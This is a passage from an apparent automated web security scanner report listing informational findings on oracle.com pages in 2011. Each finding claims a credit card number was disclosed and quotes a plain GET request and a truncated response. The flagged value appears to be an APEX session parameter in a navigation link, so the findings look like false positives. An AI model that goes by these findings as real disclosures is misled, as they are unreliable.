<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.63. http://www.oracle.com/us/corporate/Acquisitions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/Acquisitions/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/Acquisitions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35759105706347886,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.64. http://www.oracle.com/us/corporate/analystrelations/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/analystrelations/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/analystrelations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=40288174477304969,0:1)
Date: Tue, 06 Sep 2011 16:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.65. http://www.oracle.com/us/corporate/blogs/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/blogs/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/blogs/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41091191640088127,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.66. http://www.oracle.com/us/corporate/careers/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/careers/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/careers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=237;ecid=41098660587310801,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.67. http://www.oracle.com/us/corporate/citizenship/community/038108.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/citizenship/community/038108.htm

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/citizenship/community/038108.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099369257948753,0:1)
Date: Tue, 06 Sep 2011 16:15:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.68. http://www.oracle.com/us/corporate/citizenship/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/citizenship/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/citizenship/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41181377363497473,0:1)
Date: Tue, 06 Sep 2011 16:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.69. http://www.oracle.com/us/corporate/customers/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/customers/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/customers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=5;ecid=41109874747082182,0:1)
Date: Tue, 06 Sep 2011 16:13:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.70. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/customers/oracle-users-groups-192206.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/customers/oracle-users-groups-192206.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=65;ecid=41091264654533117,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.71. http://www.oracle.com/us/corporate/features/engineered-173370.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/features/engineered-173370.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/features/engineered-173370.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099957668475831,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.72. http://www.oracle.com/us/corporate/history/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/history/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/history/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008810809975844,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.73. http://www.oracle.com/us/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35651503889036777,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.74. http://www.oracle.com/us/corporate/innovation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/innovation/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/innovation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099579711348325,0:1)
Date: Tue, 06 Sep 2011 16:15:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.75. http://www.oracle.com/us/corporate/insight/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/insight/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/insight/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008621831412329,0:1)
Date: Tue, 06 Sep 2011 16:15:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.76. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/investor-relations/corporate-governance-176724.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/investor-relations/corporate-governance-176724.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099094380038254,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.77. http://www.oracle.com/us/corporate/investor-relations/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/investor-relations/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/investor-relations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41098991300821785,0:1)
Date: Tue, 06 Sep 2011 16:15:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.78. http://www.oracle.com/us/corporate/oracle-racing-070515.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/oracle-racing-070515.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/oracle-racing-070515.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008999788539688,0:1)
Date: Tue, 06 Sep 2011 16:15:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.79. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/BoardofDirectors/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/press/BoardofDirectors/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35660476075859156,0:1)
Date: Tue, 06 Sep 2011 16:13:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.80. http://www.oracle.com/us/corporate/press/Executives/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/Executives/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/press/Executives/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41172984997271740,0:1)
Date: Tue, 06 Sep 2011 16:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.81. http://www.oracle.com/us/corporate/press/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/press/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35711371439084667,0:1)
Date: Tue, 06 Sep 2011 16:13:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.82. http://www.oracle.com/us/corporate/pricing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/pricing/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/pricing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=94;ecid=35995535065858112,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.83. http://www.oracle.com/us/corporate/pricing/price-lists/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/pricing/price-lists/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/pricing/price-lists/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=8;ecid=41143019010217386,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.84. http://www.oracle.com/us/corporate/profit/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/profit/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/profit/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41045476007478889,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.85. http://www.oracle.com/us/corporate/publishing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/publishing/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/corporate/publishing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166585496136002,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.86. http://www.oracle.com/us/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41041820989036270,0:1)
Date: Tue, 06 Sep 2011 16:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.87. http://www.oracle.com/us/industries/communications/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/communications/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/industries/communications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36012062100267322,0:1)
Date: Tue, 06 Sep 2011 16:16:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.88. http://www.oracle.com/us/industries/education-and-research/018753.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/education-and-research/018753.htm

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/industries/education-and-research/018753.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36012169474451296,0:1)
Date: Tue, 06 Sep 2011 16:16:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145519

